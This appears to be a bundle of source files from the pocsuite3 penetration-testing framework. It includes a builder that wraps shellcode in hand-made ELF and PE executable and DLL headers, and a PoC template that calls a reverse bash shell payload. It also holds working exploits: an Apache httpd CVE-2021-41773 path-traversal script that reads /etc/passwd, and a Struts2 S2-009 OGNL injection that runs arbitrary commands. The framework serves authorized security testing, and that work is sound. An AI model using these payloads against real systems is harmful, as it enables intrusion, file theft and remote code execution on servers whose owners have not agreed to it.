                 b'\x80\x00\x40\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x18\x01\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x40\x00\x04\x00\x03\x00\x01\x00\x00\x00\x05\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00' \
                 b'\xff\x10\x00\x00\x00\x00\x00\x00\xff\x10\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00'
        data = header + self.shellcode
        return data

    def create_x86_dll(self):
        if self.target_arch == OS_ARCH.X64:
            logger.error('Can\'t create dll for x64 arch. Only x86 arch is supported.')
            return
        header = b'\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd' \
                 b'\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x20\x63\x61\x6e\x6e\x6f' \
                 b'\x74\x20\x62\x65\x20\x72\x75\x6e\x20\x69\x6e\x20\x44\x4f\x53\x20\x6d\x6f\x64\x65\x2e\x0d\x0d\x0a' \
                 b'\x24\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4c\x01\x03\x00\x9e\xa7\xb6\x58\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\xe0\x00\x0e\x23\x0b\x01\x02\x1b\x00\x02\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x10\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x10\x00\x00\x00\x02\x00\x00' \
                 b'\x04\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x04\x00\x00' \
                 b'\xe2\x9e\x00\x00\x03\x00\x00\x00\x00\x00\x20\x00\x00\x10\x00\x00\x00\x00\x10\x00\x00\x10\x00\x00' \
                 b'\x00\x00\x00\x00\x10\x00\x00\x00\x00\x20\x00\x00\xff\x0e\x00\x00\x00\x30\x00\x00\x14\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x74\x65\x78\x74\x00\x00\x00' \
                 b'\x54\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' \
                 b'\x00\x00\x00\x00\x20\x00\x50\x60\x2e\x65\x64\x61\x74\x61\x00\x00\xff\x0e\x00\x00\x00\x20\x00\x00' \
                 b'\x00\x04\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x30\x40' \
                 b'\x2e\x69\x64\x61\x74\x61\x00\x00\x14\x00\x00\x00\x00\x30\x00\x00\x00\x02\x00\x00\x00\x0a'
        header += b'\x00' * 546
        data = header + self.shellcode
        data += b'\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff'
        data = data.ljust(1536, b'\x00')
        data += b'\x00' * 16
        data += b'\x01\x00\x00\x00'
        data += struct.pack('<I', len(self.dll_inj_funcs)) + struct.pack('<I', len(self.dll_inj_funcs))
        data += b'\x28\x20\x00\x00'
        data += struct.pack('B', 0x28 + len(self.dll_inj_funcs) * 4) + b'\x20\x00\x00'
        data += struct.pack('B', 0x28 + len(self.dll_inj_funcs) * 8) + b'\x20\x00\x00'
        data += b'\x00\x10\x00\x00' * len(self.dll_inj_funcs)
        base = 0x2100 + len(self.filename) - 1
        data += struct.pack('<H', base) + b'\x00\x00'
        for func_name in self.dll_inj_funcs[:-1]:
            base += len(func_name) + 1
            data += struct.pack('<H', base) + b'\x00\x00'
        for i in range(len(self.dll_inj_funcs)):
            data += struct.pack('<H', i)
        data += self.filename + '.dll\x00'
        for func_name in self.dll_inj_funcs:
            data += func_name + b'\x00'
        data = data.ljust(3072, b'\x00')
        path = os.path.join(self.path, self.filename)
        self.write_file(data, path + '.dll')
        return path

    def create_executable(self):
        self.mkdirs()
        ext = ''
        path = os.path.join(self.path, self.filename)
        if self.target_os == OS.LINUX:
            if self.target_arch == OS_ARCH.X64:
                exe_code = self.create_linux_x86_64_exe()
            else:
                exe_code = self.create_linux_x86_exe()
        elif self.target_os == OS.WINDOWS:
            ext = '.exe'
            if self.target_arch == OS_ARCH.X64:
                exe_code = self.create_win_x86_64_exe()
            else:
                exe_code = self.create_win_x86_exe()
        else:
            logger.error('OS %s is not supported' % self.target_os)
            return
        self.write_file(exe_code, path + ext)
        return path

    @staticmethod
    def write_file(data, path):
        with open(path, 'wb') as f:
            f.write(data)
        logger.info('File %s is created' % path)



import binascii
import json
import re
import socket
from collections import OrderedDict

import dacite
import yaml
from pocsuite3.lib.core.common import urlparse
from pocsuite3.lib.utils import random_str
from pocsuite3.lib.yaml.nuclei.model import Severify
from pocsuite3.lib.yaml.nuclei.operators import ExtractorType, MatcherType
from pocsuite3.lib.yaml.nuclei.protocols.common.expressions import evaluate, Marker
from pocsuite3.lib.yaml.nuclei.protocols.common.generators import AttackType
from pocsuite3.lib.yaml.nuclei.protocols.http import HTTPMethod, execute_http_request
from pocsuite3.lib.yaml.nuclei.protocols.network import NetworkInputType, execute_network_request
from pocsuite3.lib.yaml.nuclei.templates import Template


def hyphen_to_underscore(dictionary):
    """
    Takes an Array or dictionary and replace all the hyphen('-') in any of its keys with a underscore('_')
    :param dictionary:
    :return: the same object with all hyphens replaced by underscore
    """
    # By default, return the same object
    final_dict = dictionary

    # for Array perform this method on every object
    if isinstance(dictionary, list):
        final_dict = []
        for item in dictionary:
            final_dict.append(hyphen_to_underscore(item))

    # for dictionary traverse all the keys and replace hyphen with underscore
    elif isinstance(dictionary, dict):
        final_dict = {}
        for k, v in dictionary.items():
            # If there is a sub dictionary or an array perform this method of it recursively
            if isinstance(dictionary[k], (dict, list)):
                value = hyphen_to_underscore(v)
                final_dict[k.replace('-', '_')] = value
            else:
                final_dict[k.replace('-', '_')] = v

    return final_dict


def expand_preprocessors(data: str) -> str:
    """
    Certain pre-processors can be specified globally anywhere in the template that run as soon as
    the template is loaded to achieve things like random ids generated for each template run.

    randstr can be suffixed by a number, and new random ids will be created for those names too.
    Ex. {{randstr_1}} which will remain same across the template.
    randstr is also supported within matchers and can be used to match the inputs.
    """
    randstr_to_replace = set(m[0] for m in re.findall(
        fr'({Marker.ParenthesisOpen}randstr(_\w+)?{Marker.ParenthesisClose})', data))
    for s in randstr_to_replace:
        data = data.replace(s, random_str(27))

    return data


class Nuclei:
    def __init__(self, template, target=''):
        self.yaml_template = template
        try:
            self.yaml_template = binascii.unhexlify(self.yaml_template).decode()
        except ValueError:
            pass
        self.json_template = yaml.safe_load(expand_preprocessors(self.yaml_template))

        # Breaking Changes in nuclei v2.9.1, Updated protocol attribute name (requests=> http & network => tcp)
        # in templates, Templates with the use of requests and network will still work but will be deprecated
        # completely in the future.

        if 'http' in self.json_template:
            self.json_template['requests'] = self.json_template['http']
        if 'tcp' in self.json_template:
            self.json_template['network'] = self.json_template['tcp']

        self.template = dacite.from_dict(
            Template, hyphen_to_underscore(self.json_template),
            config=dacite.Config(cast=[Severify, ExtractorType, MatcherType, HTTPMethod, AttackType, NetworkInputType]))

        self.target = target
        self.interactsh = None
        self.dynamic_values = OrderedDict()

    def execute_template(self):
        # Dynamic variables can be placed in the path to modify its behavior on runtime.
        # Variables start with {{ and end with }} and are case-sensitive.

        u = urlparse(self.target)
        self.dynamic_values['BaseURL'] = self.target
        self.dynamic_values['RootURL'] = f'{u.scheme}://{u.netloc}'
        self.dynamic_values['Hostname'] = u.netloc
        self.dynamic_values['Scheme'] = u.scheme
        self.dynamic_values['Host'] = u.hostname
        self.dynamic_values['Port'] = u.port
        self.dynamic_values['Path'] = '/'.join(u.path.split('/')[0:-1])
        self.dynamic_values['File'] = u.path.split('/')[-1]
        # DSL: Host != ip
        self.dynamic_values['IP'] = ''
        try:
            self.dynamic_values['IP'] = socket.gethostbyname(u.hostname)
        except socket.error:
            pass
        for k, v in self.dynamic_values.copy().items():
            self.dynamic_values[k.lower()] = v

        # Variables can be used to declare some values which remain constant throughout the template.
        # The value of the variable once calculated does not change.
        # Variables can be either simple strings or DSL helper functions. If the variable is a helper function,
        # it is enclosed in double-curly brackets {{<expression>}}. Variables are declared at template level.

        # Example variables:

        # variables:
        #     a1: "test" # A string variable
        #     a2: "{{to_lower(rand_base(5))}}" # A DSL function variable

        for k, v in self.template.variables.items():
            self.dynamic_values[k] = evaluate(v)

        # Since release of Nuclei v2.3.6, Nuclei supports using the interact.sh API to achieve OOB based
        # vulnerability scanning with automatic Request correlation built in. It's as easy as writing
        # {{interactsh-url}} anywhere in the request.

        if (f'{Marker.ParenthesisOpen}interactsh-url{Marker.ParenthesisClose}' in self.yaml_template or
                f'{Marker.General}interactsh-url{Marker.General}' in self.yaml_template):
            from pocsuite3.lib.yaml.nuclei.protocols.common.interactsh import InteractshClient
            self.interactsh = InteractshClient()
            self.dynamic_values['interactsh-url'] = self.interactsh.client.domain

        for request in self.template.requests:
            res = execute_http_request(request, self.dynamic_values, self.interactsh)
            if res:
                return res
        for request in self.template.network:
            res = execute_network_request(request, self.dynamic_values, self.interactsh)
            if res:
                return res

        return False

    def run(self):
        return self.execute_template()

    def __str__(self):
        """
        Convert nuclei template to Pocsuite3
        """
        info = []
        key_convert = {
            'description': 'desc',
            'reference': 'references'
        }
        for k, v in self.json_template['info'].items():
            if k in key_convert:
                k = key_convert.get(k)
            if type(v) in [str]:
                v = json.dumps(v.strip())

            info.append(f'    {k} = {v}')

        poc_code = [
            'from pocsuite3.api import POCBase, Nuclei, register_poc\n',
            '\n',
            '\n',
            'class TestPOC(POCBase):\n',
            '\n'.join(info),
            '\n',
            '    def _verify(self):\n',
            '        result = {}\n',
            '        if not self._check(is_http=%s):\n' % (len(self.template.requests) > 0),
            '            return self.parse_output(result)\n',
            "        template = '%s'\n" % binascii.hexlify(self.yaml_template.encode()).decode(),
            '        res = Nuclei(template, self.url).run()\n',
            '        if res:\n',
            '            result["VerifyInfo"] = {}\n',
            '            result["VerifyInfo"]["URL"] = self.url\n',
            '            result["VerifyInfo"]["Info"] = {}\n',
            '            result["VerifyInfo"]["Info"]["Severity"] = "%s"\n' % self.template.info.severity.value,
            '            if not isinstance(res, bool):\n'
            '               result["VerifyInfo"]["Info"]["Result"] = res\n',
            '        return self.parse_output(result)\n',
            '\n',
            '\n',
            'register_poc(TestPOC)\n'
        ]
        return ''.join(poc_code)



from collections import OrderedDict
from pocsuite3.api import (
    Output,
    POCBase,
    POC_CATEGORY,
    register_poc,
    requests,
    VUL_TYPE,
    get_listener_ip,
    get_listener_port,
)
from pocsuite3.lib.core.interpreter_option import (
    OptString,
    OptDict,
    OptIP,
    OptPort,
    OptBool,
    OptInteger,
    OptFloat,
    OptItems,
)
from pocsuite3.modules.listener import REVERSE_PAYLOAD


class DemoPOC(POCBase):
    vulID = "1571"  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = "1"  # 默认为1
    author = "seebug"  # PoC作者的大名
    vulDate = "2014-10-16"  # 漏洞公开的时间,不知道就写今天
    createDate = "2014-10-16"  # 编写 PoC 的日期
    updateDate = "2014-10-16"  # PoC 更新的时间,默认和编写时间一样
    references = ["https://xxx.xx.com.cn"]  # 漏洞地址来源,0day不用写
    name = "XXXX SQL注入漏洞 PoC"  # PoC 名称
    appPowerLink = "https://www.drupal.org/"  # 漏洞厂商主页地址
    appName = "Drupal"  # 漏洞应用名称
    appVersion = "7.x"  # 漏洞影响版本
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS  # 漏洞类型,类型参考见 漏洞类型规范表
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    desc = """
            Drupal 在处理 IN 语句时，展开数组时 key 带入 SQL 语句导致 SQL 注入，
            可以添加管理员、造成信息泄露。
        """  # 漏洞简要描述
    pocDesc = """
            poc的用法描述
        """  # POC用法描述

    def _options(self):
        opt = OrderedDict()  # value = self.get_option('key')
        opt["string"] = OptString("", description="这个poc需要用户登录，请输入登录账号", require=True)
        opt["integer"] = OptInteger(
            "", description="这个poc需要用户密码，请输出用户密码", require=False
        )
        return opt

    def _verify(self):
        output = Output(self)
        # 验证代码
        result = {
            # 不管是验证模式或者攻击模式，返回结果 result 中的 key 值必须按照下面的规范来写
            # [ PoC结果返回规范 ]( https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md#resultstandard )
            "Result": {
                "DBInfo": {
                    "Username": "xxx",
                    "Password": "xxx",
                    "Salt": "xxx",
                    "Uid": "xxx",
                    "Groupid": "xxx",
                },
                "ShellInfo": {"URL": "xxx", "Content": "xxx"},
                "FileInfo": {"Filename": "xxx", "Content": "xxx"},
                "XSSInfo": {"URL": "xxx", "Payload": "xxx"},
                "AdminInfo": {"Uid": "xxx", "Username": "xxx", "Password": "xxx"},
                "Database": {
                    "Hostname": "xxx",
                    "Username": "xxx",
                    "Password": "xxx",
                    "DBname": "xxx",
                },
                "VerifyInfo": {"URL": "xxx", "Postdata": "xxx", "Path": "xxx"},
                "SiteAttr": {"Process": "xxx"},
                "Stdout": "result output string",
            }
        }
        if result:  # result是返回结果
            output.success(result)
        else:
            output.fail("target is not vulnerable")
        return output

    def _attack(self):
        output = Output(self)
        result = {}
        # 攻击代码
        pass

    def _shell(self):
        """
        shell模式下，只能运行单个PoC脚本，控制台会进入shell交互模式执行命令及输出
        """
        cmd = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
        # 攻击代码 execute cmd
        pass


def other_fuc():
    pass


def other_utils_func():
    pass


# 注册 DemoPOC 类
register_poc(DemoPOC)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import urllib
from pocsuite3.api import (
    Output, POCBase, register_poc, requests
)


class TestPOC(POCBase):
    vulID = '99364'
    version = '1.0'
    author = ['fenix']
    vulDate = '2021-10-08'
    createDate = '2021-10-08'
    updateDate = '2021-10-08'
    references = ['https://www.seebug.org/vuldb/ssvid-99364']
    name = 'apache httpd dir traversal rce (cve-2021-41773/cve-2021-42013)'
    appPowerLink = 'https://httpd.apache.org'
    appName = 'apache httpd'
    appVersion = '2.4.49, 2.4.50'
    vulType = 'dir-traversal'
    dork = {'zoomeye': '"Apache/2.4.49" "Apache/2.4.50"'}
    desc = ''
    samples = ['']
    install_requires = []

    def _check(self):
        self.url = self.url.rstrip('/')
        res = requests.get(
            self.url,
            timeout=10,
            verify=False,
            allow_redirects=False
        )
        if 'Apache/2.4.49' in str(res.headers):
            return True
        elif 'Apache/2.4.50' in str(res.headers):
            return True
        return False

    def _arbitrary_file_read(self, filepath='/etc/passwd'):
        res = b''
        filepath = '/.%%32%65' * 10 + filepath
        try:
            req = urllib.request.Request(
                f'{self.url}/icons{filepath}',
            )
            res = urllib.request.urlopen(req).read()
        except Exception:
            pass
        return res

    def _verify(self):
        result = {}
        if not self._check():
            return self.parse_output(result)
        for i in ['/etc/passwd', '/windows/win.ini']:
            res = self._arbitrary_file_read(i)
            if b':/bin' in res or b'[fonts]' in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo'][i] = res.decode()
                break
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def _shell(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(TestPOC)



import hmac
import hashlib
import base64
import urllib.parse
import requests
import time

from pocsuite3.api import PLUGIN_TYPE, get_results
from pocsuite3.api import PluginBase
from pocsuite3.api import logger
from pocsuite3.api import register_plugin, conf

DINGTALK_TOKEN = ""
DINGTALK_SECRET = ""
WX_WORK_KEY = ""


def dingding_send(msg, access_token, secret, msgtype="markdown", title="pocsuite3消息推送"):
    ding_url = "https://oapi.dingtalk.com/robot/send?access_token={}".format(access_token)
    timestamp = str(round(time.time() * 1000))
    secret_enc = secret.encode('utf-8')
    string_to_sign = '{}\n{}'.format(timestamp, secret)
    string_to_sign_enc = string_to_sign.encode('utf-8')
    hmac_code = hmac.new(secret_enc, string_to_sign_enc, digestmod=hashlib.sha256).digest()
    sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
    param = "&timestamp={}&sign={}".format(timestamp, sign)
    ding_url = ding_url + param
    send_json = {
        "msgtype": msgtype,
        "markdown": {
            "title": title,
            "text": "# pocsuite3消息推送\n\n" + msg
        }
    }
    requests.post(ding_url, json=send_json)


def wx_work_send(msg, key):
    webhook_url = "https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=" + key
    send_data = {
        "msgtype": "markdown",
        "markdown": {
            "content": "# pocsuite3消息推送\n\n" + msg
        }
    }
    requests.post(webhook_url, json=send_data)


def web_hook_send(msg):
    dingtalk_token = conf.dingtalk_token or DINGTALK_TOKEN
    dingtalk_secret = conf.dingtalk_secret or DINGTALK_SECRET
    wx_work_key = conf.wx_work_key or WX_WORK_KEY
    if dingtalk_token and dingtalk_secret:
        dingding_send(msg, dingtalk_token, dingtalk_secret)
    if wx_work_key:
        wx_work_send(msg, wx_work_key)


class WebHook(PluginBase):
    category = PLUGIN_TYPE.RESULTS

    def init(self):
        debug_msg = "[PLUGIN] web hook plugin init..."
        logger.debug(debug_msg)

    def start(self):
        push_info = ""
        for result in get_results():
            if result.status == "success":
                poc_name = result.get("poc_name")
                target = result.get("target")
                push_info += "- {} found vuln: {}".format(target, poc_name)
        web_hook_send(push_info)


register_plugin(WebHook)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import unittest
from pocsuite3.api import Interactsh, requests


class TestCase(unittest.TestCase):
    def setUp(self):
        pass

    def tearDown(self):
        pass

    @unittest.skip(reason='interactsh service is unstable')
    def test_interactsh(self):
        ISH = Interactsh(token="", server="")
        url, flag = ISH.build_request(method='https')
        requests.get(url, timeout=5, verify=False)
        self.assertTrue(ISH.verify(flag))


if __name__ == '__main__':
    unittest.main()



import json
import re
from dataclasses import dataclass, field
from typing import List

from lxml import etree
from requests.structures import CaseInsensitiveDict

from pocsuite3.lib.core.log import LOGGER as logger
from pocsuite3.lib.yaml.nuclei.model import CaseInsensitiveEnum
from pocsuite3.lib.yaml.nuclei.protocols.common.expressions import evaluate, UNRESOLVED_VARIABLE, Marker


class ExtractorType(CaseInsensitiveEnum):
    RegexExtractor = "regex"
    KValExtractor = "kval"
    XPathExtractor = "xpath"
    JSONExtractor = "json"
    DSLExtractor = "dsl"


@dataclass
class Extractor:
    """Extractor is used to extract part of response using a regex.
    """
    # Name of the extractor. Name should be lowercase and must not contain spaces or underscores (_).
    name: str = ''

    # Type is the type of the extractor.
    type: ExtractorType = ExtractorType.RegexExtractor

    # Regex contains the regular expression patterns to extract from a part.
    regex: List[str] = field(default_factory=list)

    # Group specifies a numbered group to extract from the regex.
    group: int = 0

    # kval contains the key-value pairs present in the HTTP response header.
    kval: List[str] = field(default_factory=list)

    # JSON allows using jq-style syntax to extract items from json response
    json: List[str] = field(default_factory=list)

    # XPath allows using xpath expressions to extract items from html response
    xpath: List[str] = field(default_factory=list)

    # Attribute is an optional attribute to extract from response XPath.
    attribute: str = ''

    # Extracts using DSL expressions
    dsl: List[str] = field(default_factory=list)

    # Part is the part of the request response to extract data from.
    part: str = ''

    # Internal, when set to true will allow using the value extracted in the next request for some protocols (like
    # HTTP).
    internal: bool = False

    # CaseInsensitive enables case-insensitive extractions. Default is false.
    case_insensitive: bool = False


def extract_regex(e: Extractor, corpus: str) -> dict:
    """Extract data from response based on a Regular Expression.
    """
    results = {'internal': {}, 'external': {}, 'extra_info': []}

    if e.internal and e.name:
        results['internal'][e.name] = UNRESOLVED_VARIABLE

    for regex in e.regex:
        matches = re.search(regex, corpus)
        if not matches:
            continue

        lastindex = matches.lastindex

        group = e.group if lastindex and lastindex >= e.group else 0
        res = matches.group(group)
        if not res:
            continue

        if e.name:
            if e.internal:
                results['internal'][e.name] = res
            else:
                results['external'][e.name] = res
            return results
        else:
            results['extra_info'].append(res)
    return results


def extract_kval(e: Extractor, headers: CaseInsensitiveDict) -> dict:
    """Extract key: value/key=value formatted data from Response Header/Cookie
    """
    if not isinstance(headers, CaseInsensitiveDict):
        headers = CaseInsensitiveDict(headers)

    results = {'internal': {}, 'external': {}, 'extra_info': []}

    if e.internal and e.name:
        results['internal'][e.name] = UNRESOLVED_VARIABLE

    for k in e.kval:
        res = ''
        if k in headers:
            res = headers[k]
        # kval extractor does not accept dash (-) as input and must be substituted with underscore (_)
        elif k.replace('_', '-') in headers:
            res = headers[k.replace('_', '-')]
        if not res:
            continue

        if e.name:
            if e.internal:
                results['internal'][e.name] = res
            else:
                results['external'][e.name] = res
            return results
        else:
            results['extra_info'].append(res)
    return results


def extract_xpath(e: Extractor, corpus: str) -> dict:
    """A xpath extractor example to extract value of href attribute from HTML response
    """
    results = {'internal': {}, 'external': {}, 'extra_info': []}

    if e.internal and e.name:
        results['internal'][e.name] = UNRESOLVED_VARIABLE

    if corpus.startswith('<?xml'):
        doc = etree.XML(corpus)
    else:
        doc = etree.HTML(corpus)

    if doc is None:
        return results

    for x in e.xpath:
        nodes = doc.xpath(x)
        for n in nodes:
            res = ''
            if e.attribute:
                res = n.attrib[e.attribute]
            else:
                res = n.text
            if not res:
                continue

            if e.name:
                if e.internal:
                    results['internal'][e.name] = res
                else:
                    results['external'][e.name] = res
                return results
            else:
                results['extra_info'].append(res)
    return results


def extract_json(e: Extractor, corpus: str) -> dict:
    """Extract data from JSON based response in JQ like syntax
    """
    results = {'internal': {}, 'external': {}, 'extra_info': []}

    if e.internal and e.name:
        results['internal'][e.name] = UNRESOLVED_VARIABLE

    try:
        corpus = json.loads(corpus)
    except json.JSONDecodeError:
        return results

    try:
        import jq
    except ImportError:
        logger.error('Python bindings for jq not installed, it only supports linux and macos, https://pypi.org/project/jq/')
        return results

    for j in e.json:
        try:
            res = jq.compile(j).input(corpus).all()
        except ValueError:
            continue
        if not res:
            continue

        if e.name:
            if e.internal:
                results['internal'][e.name] = res
            else:
                results['external'][e.name] = res
            return results
        else:
            results['extra_info'].append(res)
    return results


def extract_dsl(e: Extractor, data: dict) -> dict:
    """Extract data from the response based on a DSL expressions
    """
    results = {'internal': {}, 'external': {}, 'extra_info': []}

    if e.internal and e.name:
        results['internal'][e.name] = UNRESOLVED_VARIABLE

    for expression in e.dsl:
        res = evaluate(f'{Marker.ParenthesisOpen}{expression}{Marker.ParenthesisClose}', data)
        if res == expression:
            continue
        if e.name:
            if e.internal:
                results['internal'][e.name] = res
            else:
                results['external'][e.name] = res
            return results
        else:
            results['extra_info'].append(res)
    return results



import sys
import logging
import colorlog
from pocsuite3.lib.core.enums import CUSTOM_LOGGING

logging.addLevelName(CUSTOM_LOGGING.SYSINFO, "*")
logging.addLevelName(CUSTOM_LOGGING.SUCCESS, "+")
logging.addLevelName(CUSTOM_LOGGING.ERROR, "-")
logging.addLevelName(CUSTOM_LOGGING.WARNING, "!")

LOGGER = logging.getLogger("pocsuite")
try:
    # for python>=3.7
    sys.stdout.reconfigure(encoding='utf-8')
except AttributeError:
    # http://www.macfreek.nl/memory/Encoding_of_Python_stdout
    import codecs
    sys.stdout = codecs.getwriter('utf-8')(sys.stdout.buffer, 'strict')
LOGGER_HANDLER = logging.StreamHandler(sys.stdout)
PRIMARY_FMT = (
    "%(cyan)s[%(asctime)s] %(log_color)s[%(levelname)s]%(reset)s %(message)s"
)
CUSTOM_FMT = "%(log_color)s[%(asctime)s] [%(levelname)s] %(message)s"

FORMATTER = colorlog.LevelFormatter(
    fmt={
        "DEBUG": PRIMARY_FMT,
        "INFO": PRIMARY_FMT,
        "WARNING": PRIMARY_FMT,
        "ERROR": PRIMARY_FMT,
        "CRITICAL": PRIMARY_FMT,
        "*": CUSTOM_FMT,
        "+": CUSTOM_FMT,
        "-": CUSTOM_FMT,
        "!": CUSTOM_FMT
    },
    datefmt="%H:%M:%S",
    log_colors={
        '*': 'cyan',
        '+': 'green',
        '-': 'red',
        '!': 'yellow',
        'DEBUG': 'blue',
        'INFO': 'green',
        'WARNING': 'yellow',
        'ERROR': 'red',
        'CRITICAL': 'bg_red,white'
    },
    secondary_log_colors={},
    style='%'
)

LOGGER_HANDLER.setFormatter(FORMATTER)
LOGGER.addHandler(LOGGER_HANDLER)
LOGGER.setLevel(logging.INFO)



#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time    : 2019/2/26 4:34 PM
# @Author  : chenghs
# @File    : test_cmd_diy_options.py
import os
import unittest
import warnings

from urllib3.exceptions import InsecureRequestWarning


class TestCase(unittest.TestCase):
    def setUp(self):
        warnings.simplefilter("ignore", ResourceWarning)
        warnings.simplefilter("ignore", InsecureRequestWarning)

    def tearDown(self):
        pass

    def verify_result(self):
        pass

    def test_cmd_run(self):
        path = os.path.dirname(os.path.realpath(__file__))

        eval_path = os.path.join(path, "../pocsuite3/cli.py")
        poc_path = os.path.join(path, "login_demo.py")
        command = (
            f'python3 {eval_path} -u http://httpbin.org/post -r {poc_path} --verify -v 2  --password mypass123 '
            '--username "asd asd" --testt abctest'
        )
        pipeline = os.popen(command)
        res = pipeline.buffer.read().decode('utf-8')
        self.assertTrue('1 / 1' in res)



from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2033-11-15'
    createDate = '2023-11-15'
    updateDate = '2023-11-15'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-009']
    name = 'Apache Struts2 s2-009'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.3.1.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-009:影响版本Struts 2.0.0-2.3.1.1'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        hash_str = random_str(10)
        exec_payload = "(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27{cmd}%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[({key})(%27meh%27)]"
        command = "echo " + hash_str
        key = "actionName"
        payload = exec_payload.format(cmd=quote(command), key=key)
        html = requests.get(self.url + "?{}={}".format(key, payload)).text
        if hash_str in html:
            result["VerifyInfo"] = {
                "URL": self.url,
                "PAYLOAD": payload,
            }

            return result
        return False

    def _attack(self):
        p = self._check()
        result = {}
        if p:
            exec_payload = "(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27{cmd}%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[({key})(%27meh%27)]"
            command = self.get_option("command")
            key = "actionName"
            payload = exec_payload.format(cmd=quote(command), key=key)
            html = requests.get(self.url + "?{}={}".format(key, payload)).text

            result["VerifyInfo"] = {
                "URL": self.url,
                "PAYLOAD": payload,
                "HTML": html.replace("\x00", "").encode()
            }

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)
